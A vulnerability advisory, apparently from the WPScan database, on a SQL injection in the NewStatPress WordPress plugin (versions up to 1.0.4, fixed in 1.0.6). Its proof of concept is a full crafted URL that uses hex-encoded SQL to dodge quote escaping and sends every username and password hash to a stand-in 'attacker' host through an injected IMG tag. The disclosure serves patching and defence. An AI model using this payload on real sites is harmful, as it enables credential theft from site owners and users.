NewStatPress <= 1.0.4 - SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitation.

In particular, at line 98 of ‘includes/nsp_search.php’.

Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel.
Proof of Concept
The following URL will trigger an SQLI attack, which in turn injects an element into the page, which allows for transmission of the retrieved user hashes to an attacker-controlled URL. In the PoC below, it will output an IMG element pointing to http://attacker/?creds=CREDS, where CREDS is replaced with a concatenated list of usernames and password hashes.

As the strings in the call are encoded with the MySQL function ‘hex’, there is no need to use any quotes. This is to bypass the quote escaping implemented by WordPress. Should an Administrative user be tricked into visiting the URL, all of the usernames and password hashes will be transmitted (so long as there are no restrictive CSP headers implemented).

http://localhost/wp-admin/admin.php?where1=ip&what1=0&where2=spider+%3D+0+UNION+SELECT+CONCAT%280x3C696D67207372633D22687474703A2F2F61747461636B65722F3F63726564733D%2C%28select+hex%28group_concat%28concat_ws%28char%2858%29%2Cwp_users.user_login%2Cwp_users.user_pass%29%29%29+from+wp_users+group+by+1%3D1%29%2C0x223e%29--&what2=0&searchsubmit=Search&page=nsp_search&newstatpress_action=search

Affects

Plugin newstatpress
fixed in version 1.0.6

References

URL https://research.g0blin.co.uk/g0blin-00057/

Classification

Type MULTI

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 162
Verified No
WPVDB ID 8080

Timeline

Publicly Published 2015-07-07 (over 1 year ago)
Added 2015-07-07 (over 1 year ago)
Last Updated 2015-07-07 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.